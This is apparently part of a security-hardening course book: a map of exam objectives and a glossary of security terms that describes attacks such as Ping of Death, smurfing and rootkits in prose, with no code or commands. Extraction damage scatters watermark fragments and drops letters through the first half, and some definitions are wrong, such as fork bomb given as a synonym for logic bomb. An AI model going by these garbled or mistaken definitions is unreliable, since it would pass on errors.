3.4 Hardening Internet Access Points
    Internet Explorer Browser Settings                         Lesson 7, Topic D
    IIS Patching and Hot Fixing                                Lesson 7, Topic C
    Apache Fundamental Security Settings                       Lesson 7, Topic C
    Securing Email Clients                                     Lesson 7, Topic D
    Securing DNS Transfers                                     Lesson 7, Topic B

Domain 4.0: Router Security (15%)
4.1 Implementation of Fundamental Cisco Router Security        Lesson 5, Topic A
    Cisco Authentication and Authorization
    Implementation of Passwords
    Implementation of Banners
    Configuration of SSH
    Verification of SSH
4.2 Describe the Routing Process                               Lesson 5, Topic B
    Describe the ARP Process
    Describe the LAN to LAN Routing Process
    Describe the LAN to WAN Routing Process
    Examine Routing Protocols
4.3 Removing Unwanted Protocols and Services                   Lesson 5, Topic C
    Describe What Services to Remove
    Configure the Removal of Unneeded Protocols
    Configure the Removal of Unneeded Services
4.4 Creation and Implementation of Access Control Lists
    Describe the Cisco ACL Process                             Lesson 5, Topic D
    Create Wildcard Masks                                      Lesson 5, Topic D
    Implement Standard ACLs                                    Lesson 5, Topic E
    Implement Extended ACLs                                    Lesson 5, Topic E
    Implement ACLs to Defend Against Attacks                   Lesson 5, Topic E
4.5 Configuring Cisco Router Logging                           Lesson 5, Topic F
    Describe Logging Options on a Cisco Router
    Configure Buffered Logging
    Configure Antispoofing Logging

Domain 5.0: TCP/IP Packet Structure and Security (25%)
5.1 Examine the Core Concepts of TCP/IP
    Create a VLSM                                              Lesson 1, Topic A
    Identify Protocols and their Corresponding OSI Layer       Lesson 1, Topic A
    Describe Multi, Broad, and Uni-Casting                     Lesson 1, Topic A
    Examine Packet Capture and Analysis Tools                  Lesson 1, Topic B
    Analyze Packet Fragmentation                               Lesson 1, Topic G
5.2 Identify and Describe Packet Headers
    Describe the Structure of a Packet                         Lesson 1, Topics C, D, E, and F
    Identify and Describe the IP Header                        Lesson 1, Topic C
    Identify and Describe the ICMP Header                      Lesson 1, Topic D
    Identify and Describe the TCP Header                       Lesson 1, Topic E
    Identify and Describe the UDP Header                       Lesson 1, Topic F
5.3 Examine the Session Setup and Teardown
    Describe the TCP Lifecycle                                 Lesson 1, Topic B
    Identify the Concepts of the Three-Way Handshake           Lesson 1, Topic B
    Describe the Session Establishment Process                 Lesson 1, Topic B
    Describe the Session Teardown Process                      Lesson 1, Topics B and H
5.4 Identify and Implement IPv6                                Lesson 1, Topic I
    Describe Benefits of IPv6 over IPv4
    Identify IPv6 Addressing Schemes
    Implementation of IPv6 on a Windows Client
    Configuration and Use of IPv6 Utilities

Domain 6.0: Operating System Security (35%)
6.1 Windows 2000 Infrastructure Security                       Lesson 4, Topic A
    Describe Active Directory Components
    Describe Group Policy
    Creation of a GPO
6.2 Examine Windows 2000 Authentication                        Lesson 4, Topic B
    Describe LM Authentication
    Describe NTLM Authentication
    Describe and Configure NTLMv2 Authentication
    Describe Kerberos in Windows 2000
6.3 Implement Windows 2000 Security Configuration Tools        Lesson 4, Topic C
    Securing the Administrator Account
    Configuring the Security Configuration and Analysis Tool
    Implementing Security Templates
    Creation of Security Templates
    Using Secedit.exe
6.4 Configure Windows 2000 Resource Security
    File and Folder Permissions in Windows 2000                Lesson 4, Topic D
    Implement Windows 2000 Registry Security                   Lesson 4, Topic D
    Implement Windows 2000 Printer Security                    Lesson 4, Topic D
    Manage Services and SubSystems                             Lesson 4, Topic D
    Implement EFS                                              Lesson 4, Topic F
6.5 Windows 2000 Auditing and Logging                          Lesson 4, Topic E
    Enable Auditing in Windows 2000
    Manage Event Logs
    Security-related Event IDs
    Audit Authentication Access
6.6 Windows 2000 Network Security                              Lesson 4, Topic G
    Examine NAT and Internet Connection Sharing
    Describe the Routing and Remote Access Service
    Examine the Internet Authentication Services
    Implement a RADIUS System
6.7 Fundamental Linux Security                                 Lesson 3, Topic B
    Configure File Permissions
    Configure Directory Permissions
    Managing the Password File
    Managing the Shadow Password File
6.8 Securing SAMBA                                             Lesson 3, Topic D
    Configuring SAMBA Key Files
    Configuring the SAMBA Server
    Configuring the SAMBA Client
    Securing the SAMBA Connections
6.9 Network Configuration Security                             Lesson 3, Topic D
    Configuring NFS Servers
    Configuring NFS Clients
    Securing NFS
    Configuring NIS
    Securing NIS
6.10 Securing Linux
    Remove Unused Services                                     Lesson 3, Topic E
    Implement and Configure TCPWrappers                        Lesson 3, Topic C
    Implement and Configure Tripwire                           Lesson 3, Topic E
    Auditing and Logging on Linux                              Lesson 3, Topic E
    Implement and Configure Bastille                           Lesson 3, Topic E

GLOSSARY
Administrative Security The management constraints and supplemental controls established to provide an acceptable level of protection for dened resources. AIS (Automated Information System) Any equipment of an interconnected system or subsystem of equipment that is used in the automatic acquisition, storage, manipulation, control, display, transmission, or reception of data and includes software, rmware, and hardware. alert A formatted message describing a circumstance relevant to network security. Alerts are often derived from critical audit events. ankle-biter A person who aspires to be a hacker/ cracker but has very limited knowledge or skills related to AISs. Usually associated with young teens who collect and use simple malicious programs obtained from the Internet. Anomaly Detection Model A model where intrusions are detected by looking for activity that is different from the users or systems normal behavior. assessment An analysis of the vulnerabilities of an AIS. Information acquisition and review process designed to assist a customer to determine how best to use resources to protect information in systems. assurance A measure of condence that the security features and architecture of an AIS accurately mediate and enforce the security policy.

or
DO NO

ru ct

st

Application Level Gateway (Firewall) A rewall system in which service is provided by processes that maintain complete TCP connection state and sequencing. Application level rewalls often readdress traffic so that outgoing trafc appears to have originated from the rewall, rather than the internal host. ASIM (Automated Security Incident Measurement) Monitors network traffic and collects information on targeted unit networks by detecting unauthorized network activity.

audit trail In computer security systems, a chronological record of system resource usage. This includes user login, le access, other various activities, and whether any actual or attempted security violations occurred. authenticate To establish the validity of a claimed user or object. authentication To positively verify the identity of a user, device, or other entity in a computer system, often as a prerequisite to allowing access to resources in a system.

In

DU

audit The independent examination of records and activities to ensure compliance with established controls, policy, and operational procedures, and to recommend any indicated changes in controls, policy, or procedures.

PL

IC

AT
Glossary 549

attack An attempt to bypass security controls on a computer. The attack may alter, release, or deny data. Whether an attack will succeed depends on the vulnerability of the computer system and the effectiveness of existing countermeasures.

Ed

iti

on

GLOSSARY
Authentication Header A eld that immediately follows the IP header in an IP datagram and provides authentication and integrity checking for the datagram. Automated Security Monitoring All security features needed to provide an acceptable level of protection for hardware, software, and classied, sensitive, unclassied, or critical data, material, or processes. availability Assuring information and communications services will be ready for use when expected. back door A hole in the security of a computer system deliberately left in place by designers or maintainers. Synonymous with trap door; a hidden software or hardware mechanism used to circumvent security controls. buffer overflow This happens when more data is put into a buffer or holding area than the buffer can handle. This is due to a mismatch in processing rates between the producing and consuming processes. This can result in system crashes or the creation of a back door leading to system access. bug An unwanted and unintended property of a program or piece of hardware, especially one that causes it to malfunction. C2 Command and Control. C2-attack Prevent effective C2 of adversary forces by denying information to, inuencing, degrading, or destroying the data systems. C2-protect Maintain effective command and control of own forces by turning to friendly advantage or negating adversary effort to deny information to, inuence, degrade, or destroy the friendly C2 system. (Pending approval in JP 1-02.) C2W Command and Control Warfare. The integrated use of operations security, military deception, psychological operations, electronic warfare, and physical destruction, mutually supported by intelligence, to deny information to, inuence, degrade, or destroy adversary command and control capabilities, while protecting friendly command and control capabilities against such actions. Command and control warfare is an application of information operations in military operations and is a subset of information warfare. 
CGI (Common Gateway Interface) CGI is the method that Web servers use to allow interaction between servers and clients.

Ed
T DU

or
DO NO

550

Hardening The Infrastructure (SCP)

In

st

ru ct

Bell-La Padula Security Model Formal-state transition model of computer security policy that describes a formal set of access controls based on information sensitivity and subject authorizations.

Biba Integrity Model A formal security model for the integrity of subjects and objects in a system. bomb A general synonym for crash, normally of software or operating system failures.

breach The successful defeat of security controls which could result in a penetration of the system. A violation of controls of a particular information system such that information assets or system components are unduly exposed.

PL

IC

AT

iti

on

GLOSSARY
CGI scripts Allows for the creation of dynamic and interactive Web pages. They also tend to be the most vulnerable part of a Web server (besides the underlying host security). Check_Password A hacking program used for cracking VMS passwords. Chernobyl Packet Also called Kamikaze Packet. A network packet that induces a broadcast storm and network meltdown. Typically an IP Ethernet datagram that passes through a gateway with both source and destination Ethernet and IP address set as the respective broadcast addresses for the subnetworks being identical. Circuit Level Gateway One form of a rewall. Validates TCP and UDP sessions before opening a connection. Creates a handshake and, once that takes place, passes everything through until the session is terminated. compromise An intrusion into a computer system where unauthorized disclosure, modication, or destruction of sensitive information may have occurred.

computer fraud Misrepresentation or alteration of data in order to obtain something of value. Computer Network Attack Operations to disrupt, deny, degrade, or destroy information resident in computers and computer networks, or the computers and networks themselves. (DODD S-3600.1 of 9 Dec 1996) computer security Technological and managerial procedures applied to computer systems to ensure the availability, integrity, and condentiality of information managed by the computer. computer security incident Any intrusion or attempted intrusion into an automated information system (AIS). Incidents can include probes of multiple computer systems. computer security intrusion Any event of unauthorized access or penetration to an automated information system (AIS). confidentiality Assuring information will be kept secret, with access limited to appropriate persons.

Ed
T DU

computer abuse The willful or negligent unauthorized activity that affects the availability, condentiality, or integrity of computer resources. Computer abuse includes fraud, embezzlement, theft, malicious damage, unauthorized use, denial of service, and misappropriation.

or
DO NO

Clipper chip A tamper-resistant VLSI chip designed by NSA for encrypting voice communications. It conforms to the Escrow Encryption Standard (EES) and implements the Skipjack encryption algorithm. COAST (Computer Operations, Audit, and Security Technology) A multiple project, multiple investigator laboratory in computer security research in the Computer Sciences Department at Purdue University. It functions with close ties to researchers and engineers in major companies and government agencies. Its research is focused on realworld needs and limitations, with a special focus on security for legacy.

In

st

ru ct

PL

IC

AT
Glossary 551

iti

on

GLOSSARY
COPS (Computer Oracle and Password System) A computer network monitoring system for UNIX machines. Software tool for checking security on shell scripts and C programs. Checks for security weaknesses and provides warnings. COTS software (Commercial Off the Shelf Software) Acquired by government contract through a commercial vendor. This software is a standard product, not developed by a vendor for a particular government project. countermeasures Action, device, procedure, technique, or other measure that reduces the vulnerability of an automated information system. Countermeasures that are aimed at specic threats and vulnerabilities involve more sophisticated techniques as well as activities traditionally perceived as security. Crack A popular hacking tool used to decode encrypted passwords. System administrators also use Crack to assess weak passwords by novice users in order to enhance the security of the AIS. cracker One who breaks security on an AIS. cracking The act of breaking into a computer system. cryptanalysis Denition 1: The analysis of a cryptographic system and/or its inputs and outputs to derive condential variables and/or sensitive data including cleartext. Denition 2: Operations performed in converting encrypted messages to plaintext without initial knowledge of the cryptoalgorithm and/or key employed in the encryption. cryptographic hash function A process that computes a value (referred to as a hashword) from a particular data unit in a manner that, when a hashword is protected, manipulation of the data is difficult to attain. cryptography The art of science concerning the principles, means, and methods for rendering plaintext unintelligible and for converting encrypted messages into intelligible form.

Ed
T DU

or
NO DO

ru ct st
552 Hardening The Infrastructure (SCP)

cyberspace Describes the world of connected computers and the society that gathers around them. Commonly known as the Internet. dark-side hacker A criminal or malicious hacker. DARPA Defense Advanced Research Projects Agency. data driven attack A form of attack that is encoded in seemingly innocuous data which is executed by a user or a process to implement an attack. A data driven attack is a concern for rewalls, since it may get through the rewall in data form and launch an attack against a system behind the rewall.

crash A sudden, usually drastic failure of a computer system.

In

PL

cryptology The science which deals with hidden, disguised, or encrypted communications.

IC

AT

iti

on

GLOSSARY
defensive information operations A process that integrates and coordinates policies and procedures, operations, personnel, and technology to protect information and defend information systems. Defensive information operations are conducted through information assurance, physical security, operations security, counterdeception, counter-psychological operations, counter-intelligence, electronic protect, and special information operations. Defensive information operations ensure timely, accurate, and relevant information access while denying adversaries the opportunity to exploit friendly information and information systems for their own purposes. demon dialer A program which repeatedly calls the same telephone number. This is benign and legitimate for access to a BBS but malicious when used as a denial of service attack. Denial of Service Action(s) which prevent any part of an AIS from functioning in accordance with its intended purpose. derf The act of exploiting a terminal which someone else has absent-mindedly left logged on. DII (Defense Information Infrastructure) The shared or interconnected system of computers, communications, data applications, security, people, training, and other support structures serving DoD local, national, and worldwide information needs. DII connects DoD mission support, command and control, and intelligence computers through voice, telecommunications, imagery, video, and multimedia services. It provides information processing and services to the subscribers over the Defense Information Systems Network and includes command and control, tactical, intelligence, and commercial communications systems used to transmit DoD information. (Pending)

Ed
T DU

or
DO NO

DES (Data Encryption Standard) Denition 1: An unclassied crypto algorithm adopted by the National Bureau of Standards for public use. Denition 2: A cryptographic algorithm for the protection of unclassied data, published in Federal Information Processing Standard (FIPS) 46. The DES, which was approved by the National Institute of Standards and Technology (NIST), is intended for public and government use.

In

st

ru ct

DNS spoofing Assuming the DNS name of another system by either corrupting the name service cache of a victim system, or by compromising a domain name server for a valid domain. EA (Electronic Attack) A division of EW involving the use of electromagnetic, directed energy, or antiradiation weapons to attack personnel, facilities, or equipment with the intent of degrading, neutralizing, or destroying enemy combat capability. EA includes actions taken to prevent or reduce an enemys effective use of the electromagnetic spectrum, such as jamming and electromagnetic deception and employment of weapons that use either electromagnetic or directed energy as their primary destructive mechanism.

PL

IC

DMZ (Demilitarized Zone) A part of the network that is neither part of the internal network nor directly part of the Internet. Basically a network sitting between two networks.

AT
Glossary 553

iti

on

GLOSSARY
EP (Electronic Protection) A division of EW involving actions taken to protect personnel, facilities, and equipment from any effects of friendly or enemy employment of EW that degrade, neutralize, or destroy friendly combat capability. ES (Electronic Warfare Support) A division of EW involving actions tasked by, or under direct control of, an operational commander to search for, intercept, identify, and locate sources of intentional and unintentional radiated electromagnetic energy for the purpose of immediate threat recognition. Thus, electronic warfare support provides information required for immediate decisions involving EW operations and other tactical actions such as threat avoidance, targeting, and homing. ES data can be used to produce signals intelligence. ESP (Encapsulating Security Payload) A mechanism to provide condentiality and integrity protection to IP datagrams. false negative Occurs when an actual intrusive action has occurred but the system allows it to pass as non-intrusive behavior. false positive Occurs when the system classies an action as anomalous (a possible intrusion) when it is a legitimate action. fault tolerance The ability of a system or component to continue normal operation despite the presence of hardware or software faults. firewall A system or combination of systems that enforces a boundary between two or more networks. A gateway that limits access between networks in accordance with local security policy. The typical rewall is an inexpensive micro-based UNIX box kept clean of critical data, with many modems and public network ports on it, but just one carefully watched connection back to the rest of the cluster. fishbowl To contain, isolate, and monitor an unauthorized user within a system in order to gain information about the user. Fork Bomb Also known as Logic Bomb. Code that can be written in one line of code on any UNIX system, used to recursively spawn copies of itself. 
Eventually explodes, eating all the process table entries and effectively locking up the system. hacker A malicious or inquisitive meddler who tries to discover information by poking around. A person who enjoys learning the details of programming systems and how to stretch their capabilities, as opposed to most users who prefer to learn the necessary minimum.

Ed
T DU

or
DO NO

554

Hardening The Infrastructure (SCP)

In

st

ru ct

Ethernet sniffing Listening with software to the Ethernet interface for packets that interest the user. When the software sees a packet that ts certain criteria, it logs it to a le. The most common criteria for an interesting packet is one that contains words like login or password. EW (Electronic Warfare) Any military action involving the use of electromagnetic and directed energy to control the electromagnetic spectrum or to attack the enemy. The three major subdivisions within electronic warfare are electronic attack, electronic protection, and electronic warfare support.

PL

IC

AT

iti

on

GLOSSARY
hacking Unauthorized use, or attempts to circumvent or bypass the security mechanisms of an information system or network. hacking run A hack session extended long outside normal working times, especially one longer than 12 hours. host A single computer or workstation; it can be connected to a network. host based Information, such as audit data from a single host which may be used to detect intrusions. IA (Information Assurance) Information Operations that protect and defend information and information systems by ensuring their availability, integrity, authentication, condentiality, and non-repudiation. This includes providing for restoration of information systems by incorporating protection, detection, and reaction capabilities. (DODD S-3600.1 of 9 Dec 1996) IDEA (International Data Encryption Algorithm) A private key encryption-decryption algorithm that uses a key that is twice the length of a DES key. information superiority The capability to collect, process, and disseminate an uninterrupted ow of information while exploiting or denying an adversarys ability to do the same. (DODD S-3600.1 of 9 Dec 1996) integrity Assuring information will not be accidentally or maliciously altered or destroyed.

or
DO NO

ru ct

st

IDIOT (Intrusion Detection In Our Time) A system that detects intrusions using patternmatching. information security The result of any system of policies and/or procedures for identifying, controlling, and protecting from unauthorized disclosure, information whose protection is authorized by executive order or statute.

IO (Information Operations) Actions taken to affect adversary information and information systems while defending ones own information and information systems. (DODD S-3600.1 of 9 Dec 96) IP splicing/hijacking An action whereby an active, established session is intercepted and co-opted by the unauthorized user. IP splicing attacks may occur after an authentication has been made, permitting the attacker to assume the role of an already authorized user. Primary protections against IP splicing rely on encryption at the session or network layer.

In

DU

intrusion detection Pertaining to techniques which attempt to detect intrusion into a computer or network by observation of actions, security logs, or audit data. Detection of break-ins or attempts either manually or via software expert systems that operate on logs or other information available.

PL

IC

AT
Glossary 555

intrusion Any set of actions that attempts to compromise the integrity, condentiality, or availability of a resource.

Ed

Internet worm A worm program (see: worm) that was unleashed on the Internet in 1988. It was written by Robert T. Morris as an experiment that got out of hand.

iti

on

GLOSSARY
IP spoofing An attack whereby a system attempts to illicitly impersonate another system by using IP network address. IW (Information Warfare) Information Operations conducted during a time of crisis or conict to achieve or promote specic objectives over a specic adversary or adversaries. (DODD S-3600.1 of 9 Dec 1996) leapfrog attack Use of user ID and password information obtained illicitly from one host to compromise another host. The act of TELNETing through one or more hosts in order to preclude a trace (a standard cracker procedure). letterbomb A piece of email containing live data intended to do malicious things to the recipients machine or terminal. Under UNIX, a letterbomb can also try to get part of its contents interpreted as a shell command to the mailer. The results of this could range from amusing to denial of service. Logic Bomb Also known as a Fork Bomb. A resident computer program which, when executed, checks for a particular condition or particular state of the system which, when satised, triggers the perpetration of an unauthorized act. mailbomb The mail sent to urge others to send massive amounts of email to a single system or person, with the intent to crash the recipients system. malicious code Hardware, software, or rmware that is intentionally included in a system for an unauthorized purpose (for example, a Trojan Horse). metric A random variable x representing a quantitative measure accumulated over a period. mimicking Synonymous with impersonation, masquerading, or spoong.

key A symbol or sequence of symbols (or electrical or mechanical correlates of symbols) applied to text in order to encrypt or decrypt. key escrow The system of giving a piece of a key to each of a certain number of trustees such that the key can be recovered with the collaboration of all the trustees.

Ed
T DU

or
DO NO

556

Hardening The Infrastructure (SCP)

In

st

ru ct

keystroke monitoring A specialized form of audit trail software, or a specially designed device, that records every key struck by a user and every character of the response that the AIS returns to a user system. LAN (Local Area Network) A computer communications system limited to no more than a few miles and using high-speed connections (2 to 100 megabits per second). A short-haul communications system that connects ADP devices in a building or group of buildings within a few square kilometers, including workstations, frontend processors, controllers, and servers.

PL

IC

AT

iti

on

GLOSSARY
Misuse Detection Model: The intrusion detection system detects intrusions by looking for activity that corresponds to known intrusion techniques or system vulnerabilities. Also known as rules based detection.
mockingbird: A computer program or process that mimics the legitimate behavior of a normal system feature (or other apparently useful function) but performs malicious activities once invoked by the user.
Multihost Based Auditing: Audit data from multiple hosts may be used to detect intrusions or misuse.
nack attack: Negative acknowledgment attack. A penetration technique that capitalizes on a potential weakness in an operating system that does not handle asynchronous interrupts properly, leaving the system in an unprotected state during such interrupts.
NCSC (National Computer Security Center): Originally named the DoD Computer Security Center. With the signing of NSDD-145, the NCSC became responsible for encouraging the widespread availability of trusted computer systems throughout the Federal Government.
network: Two or more machines interconnected for communications.
network based: Intrusion detection that uses network traffic data, along with audit data from the hosts, to detect intrusions.
network level firewall: A firewall in which traffic is examined at the network protocol (IP) packet level.
network security: Protection of networks and their services from unauthorized modification, destruction, or disclosure, and provision of assurance that the network performs its critical functions correctly and there are no harmful side effects. Network security includes providing for data integrity.
network security officer: Individual formally appointed by a designated approving authority to ensure that the provisions of all applicable directives are implemented throughout the life cycle of an automated information system network.
network weaving: Another name for leapfrogging.
NII (National Information Infrastructure): The nationwide interconnection of communications networks, computers, databases, and consumer electronics that makes vast amounts of information available to users. The NII encompasses a wide range of equipment, including cameras, scanners, keyboards, facsimile machines, computers, switches, compact disks, video and audio tape, cable, wire, satellites, fiber optic transmission lines, networks of all types, monitors, printers, and much more. The friendly and adversary personnel who make decisions and handle the transmitted information constitute a critical component of the NII. (Pending approval in JP 1-02.)
non-discretionary security: The aspect of DoD security policy which restricts access on the basis of security levels. A security level is composed of a read-level (hierarchical classification) and a category-set restriction. For read access to an item of information, a user must have a clearance level greater than or equal to the classification of the information and also have a category clearance which includes all of the access categories specified for that information.
non-repudiation: Method by which the sender of data is provided with proof of delivery and the recipient is assured of the sender's identity, so that neither can later deny having processed the data.
open security: Environment that does not provide sufficient assurance that applications and equipment are protected against the introduction of malicious logic prior to or during the operation of a system.
open systems security: Provision of tools for the secure internetworking of open systems.
operational data security: The protection of data from either accidental or unauthorized, intentional modification, destruction, or disclosure during input, processing, or output operations.
operations security: Definition 1) The process of denying adversaries information about friendly capabilities and intentions by identifying, controlling, and protecting indicators associated with planning and conducting military operations and other activities. Definition 2) An analytical process by which the US Government and its supporting contractors can deny to potential adversaries information about capabilities and intentions by identifying, controlling, and protecting evidence of the planning and execution of sensitive activities.
OPSEC (Operations Security): A process of identifying critical information and subsequently analyzing friendly actions attendant to military operations and other activities to a. identify those actions that can be observed by adversary intelligence systems, b. determine indicators hostile intelligence systems might obtain that could be interpreted or pieced together to derive critical information in time to be useful to adversaries, and c. select and execute measures that eliminate or reduce to an acceptable level the vulnerabilities of friendly actions.
Orange Book: See Trusted Computer System Evaluation Criteria (TCSEC).
OSI (Open Systems Interconnection): A set of internationally accepted and openly developed standards that meet the needs of network resource administration and integrated network components.
packet: A block of data sent over the network carrying the identities of the sending and receiving stations, error-control information, and the message.
packet filter: Inspects each packet for user-defined content, such as an IP address, but does not track the state of sessions. This is one of the least secure types of firewall.
packet filtering: A feature incorporated into routers and bridges to limit the flow of information based on pre-determined criteria such as source, destination, or type of service being provided by the network. Packet filters let the administrator limit protocol-specific traffic to one network segment, isolate email domains, and perform many other functions.
packet sniffer: A device or program that monitors the data travelling between computers on a network.
passive attack: Attack which does not result in an unauthorized state change, such as an attack that only monitors and/or records data.
passive threat: The threat of unauthorized disclosure of information without changing the state of the system. A type of threat that involves the interception, not the alteration, of information.
PEM (Privacy Enhanced Mail): An IETF standard for secure electronic mail exchange.
penetration: The successful unauthorized access to an automated system.
penetration signature: The description of a situation or set of conditions in which a penetration could occur, or of system events which in conjunction can indicate the occurrence of a penetration in a system.
penetration testing: The portion of security testing in which the evaluators attempt to circumvent the security features of a system. The evaluators may be assumed to use all system design and implementation documentation, which may include listings of system source code, manuals, and circuit diagrams.
perimeter based security: The technique of securing a network by controlling access to all entry and exit points of the network. Usually associated with firewalls and/or filters.
perpetrator: The entity from the external environment that is taken to be the cause of a risk. An entity in the external environment that performs an attack, such as a hacker.
personnel security: The procedures established to ensure that all personnel who have access to any classified information have the required authorizations as well as the appropriate clearances.
PGP (Pretty Good Privacy): A freeware program, primarily for secure electronic mail, that uses public key cryptography to encrypt and sign messages and files.
phage: A program that modifies other programs or databases in unauthorized ways; especially one that propagates a virus or Trojan horse.
PHF: A phone book demonstration CGI program shipped with early web servers, which attackers used to gain access to the server and read or capture password files.
PHF hack: Exploitation of the well-known vulnerable phf CGI script, which does not filter out special characters (such as a newline) from user input, allowing an attacker to run commands on the web server.
phracker: An individual who combines phone phreaking with computer hacking.
phreak(er): An individual fascinated by the telephone system. Commonly, an individual who uses his knowledge of the telephone system to make calls at the expense of another.
phreaking: The art and science of cracking the phone network.
physical security: The measures used to provide physical protection of resources against deliberate and accidental threats.
piggy back: The gaining of unauthorized access to a system via another user's legitimate connection.
Ping of Death: Sending an ICMP echo request (ping) whose reassembled datagram is larger than the maximum IP packet size of 65,535 bytes, that is, with more than 65,507 bytes of ping data. Systems with flawed reassembly code crashed or hung, causing a denial of service.
plaintext: Unencrypted data.
Private Key Cryptography: An encryption methodology in which the encryptor and decryptor use the same key, which must be kept secret (also called symmetric or secret key cryptography). Because every party that shares the key can both encrypt and decrypt, this methodology is usually only used within a small group.
probe: Any effort to gather information about a machine or its users for the apparent purpose of gaining unauthorized access to the system at a later date.
procedural security: See Administrative Security.
profile: Patterns of a user's activity against which changes in normal routines can be detected.
promiscuous mode: Normally an Ethernet interface reads the address of every frame on the segment but accepts only those destined for itself (or for a broadcast or subscribed multicast address); in promiscuous mode it accepts every frame regardless of destination, which is what a sniffer relies on.
protocol: Agreed-upon methods of communication used by computers. A specification that describes the rules and procedures that products should follow to perform activities on a network, such as transmitting data. If they use the same protocols, products from different vendors should be able to communicate on the same network.
prowler: A daemon that is run periodically to seek out and erase core files, truncate administrative log files, nuke lost-and-found directories, and otherwise clean up.
proxy: A firewall mechanism that terminates a client's connection and opens its own connection to the destination, so that the internal (protected) host's IP address is replaced by the proxy's own for all traffic passing through it. More generally, a software agent that acts on behalf of a user: a typical proxy accepts a connection from a user, decides whether the user or client IP address is permitted to use the proxy, perhaps performs additional authentication, and then completes a connection on behalf of the user to a remote destination.
PSYOP (Psychological Operations): Planned operations to convey selected information and indicators to foreign audiences to influence their emotions, motives, objective reasoning, and ultimately the behavior of foreign governments, organizations, groups, and individuals. The purpose of psychological operations is to induce or reinforce foreign attitudes and behavior favorable to the originator's objectives.
Public Key Cryptography: Cryptography in which each party holds a key pair: a public key, which can be published and used by anyone to encrypt a message to that party or to verify its signature, and a private key, which must be kept secret and is required to decrypt or to sign. Only the holder of the private key can read what was encrypted with the matching public key.
Red Book: See Trusted Network Interpretation.
reference monitor: A security control concept in which an abstract machine mediates accesses to objects by subjects. In principle, a reference monitor should be complete (in that it mediates every access), isolated from modification by system entities, and verifiable. A security kernel is an implementation of a reference monitor for a given hardware base.
replicator: Any program that acts to produce copies of itself; examples include a program, worm, fork bomb, or virus. It is even claimed by some that UNIX and C are the symbiotic halves of an extremely successful replicator.
retro-virus: A virus that waits until all possible backup media are infected too, so that it is not possible to restore the system to an uninfected state.
rexd: The Sun RPC server for remote program execution on Unix. The daemon is started by inetd whenever a remote execution request is made; because it trusts the user identity supplied by the client, it is normally disabled.
risk assessment: A study of vulnerabilities, threats, likelihood, loss or impact, and theoretical effectiveness of security measures. The process of evaluating threats and vulnerabilities, known and postulated, to determine expected loss and establish the degree of acceptability to system operations.
risk management: The total process to identify, control, and minimize the impact of uncertain events. The objective of the risk management program is to reduce risk and obtain and maintain DAA (Designated Approving Authority) approval.
rootkit: A collection of tools that allows an attacker who has already gained privileged access to keep a back door into a system, capture passwords and message traffic to and from the computer, collect information on other systems on the network, mask the fact that the system is compromised, and much more. A rootkit is a classic example of Trojan Horse software, typically replacing system binaries such as ls, ps and netstat with versions that hide the intruder's files, processes and connections. Rootkits exist for a wide range of operating systems.
router: A device that forwards packets between networks based on Network Layer (IP) addresses, whereas a bridge forwards frames at the Data Link Layer without regard to the protocol carried. Routers link LANs at the Network Layer.
routing control: The application of rules during the process of routing so as to choose or avoid specific networks, links, or relays.
RSA Algorithm: RSA stands for Rivest-Shamir-Adleman. A public-key cryptographic algorithm whose security hinges on the assumption that factoring the product of two large primes is difficult.
Rules Based Detection: The intrusion detection system detects intrusions by looking for activity that corresponds to known intrusion techniques (signatures) or system vulnerabilities. Also known as Misuse Detection.
samurai: A hacker who hires out for legal cracking jobs, snooping for factions in corporate political fights, lawyers pursuing privacy-rights and First Amendment cases, and other parties with legitimate reasons to need an electronic locksmith.
SATAN (Security Administrator Tool for Analyzing Networks): A tool for remotely probing and identifying the vulnerabilities of systems on IP networks. A powerful freeware program which helps to identify system security weaknesses.
secure network server: A device that acts as a gateway between a protected enclave and the outside world.
secure shell (SSH): A protocol and program that provides an encrypted, authenticated shell connection (and file transfer) between two machines, replacing cleartext protocols such as telnet and rlogin. Users authenticate with a password or with a key pair whose private key is protected by a passphrase.
security: A condition that results from the establishment and maintenance of protective measures that ensure a state of inviolability from hostile acts or influences.
security architecture: A detailed description of all aspects of the system that relate to security, along with a set of principles to guide the design. A security architecture describes how the system is put together to satisfy the security requirements.
security audit: A search through a computer system for security problems and vulnerabilities.
security countermeasures: Countermeasures that are aimed at specific threats and vulnerabilities or involve more active techniques as well as activities traditionally perceived as security.
security domains: The sets of objects that a subject has the ability to access.
security features: The security-relevant functions, mechanisms, and characteristics of AIS hardware and software.
security incident: Any act or circumstance that involves classified information that deviates from the requirements of governing security publications. For example, compromise, possible compromise, inadvertent disclosure, and deviation.
security kernel: The hardware, firmware, and software elements of a Trusted Computing Base that implement the reference monitor concept. It must mediate all accesses, be protected from modification, and be verifiable as correct.
security label: Piece of information that represents the sensitivity of a subject or object, such as its hierarchical classification (CONFIDENTIAL, SECRET, TOP SECRET) together with any applicable non-hierarchical security categories (such as sensitive compartmented information or critical nuclear weapon design information).
security level: The combination of a hierarchical classification and a set of non-hierarchical categories that represents the sensitivity of information.
security officer: The ADP official having the designated responsibility for the security of an ADP system.
security perimeter: The boundary where security controls are in effect to protect assets.
security policies: The set of laws, rules, and practices that regulate how an organization manages, protects, and distributes sensitive information.
security policy model: A formal presentation of the security policy enforced by the system. It must identify the set of rules and practices that regulate how a system manages, protects, and distributes sensitive information.
security requirements: Types and levels of protection necessary for equipment, data, information, applications, and facilities.
security service: A service, provided by a layer of communicating open systems, which ensures adequate security of the systems or of data transfers.
security violation: An instance in which a user or other person circumvents or defeats the controls of a system to obtain unauthorized access to information contained therein or to the system itself.
server: A system that provides network service such as disk storage and file transfer, or a program that provides such a service. A kind of daemon that performs a service for the requester, which often runs on a computer other than the client machine.
Signaling System 7 (SS-7): A signaling protocol used by phone companies. It has three basic functions: supervising, alerting, and addressing. Supervising monitors the status of a line or circuit to see if it is busy, idle, or requesting service. Alerting indicates the arrival of an incoming call. Addressing is the transmission of routing and destination signals over the network in the form of dial tone or data pulses.
SIO (Special Information Operations): Information Operations that, by their sensitive nature, due to their potential effect or impact, security requirements, or risk to the national security of the United States, require a special review and approval process. (DODD S-3600.1 of 9 Dec 96)
skipjack: An NSA-developed block cipher for the Clipper chip. The algorithm was originally classified; NSA declassified and published it in 1998.
smurfing: A denial of service attack in which an attacker spoofs the source address of an ICMP echo-request (ping) packet to be that of the victim and sends it to the broadcast address of a network, causing the machines in that network to respond en masse to the victim.
snarf: To grab a large document or file for the purpose of using it with or without the author's permission.
sneaker: An individual hired to break into places in order to test their security; analogous to tiger team.
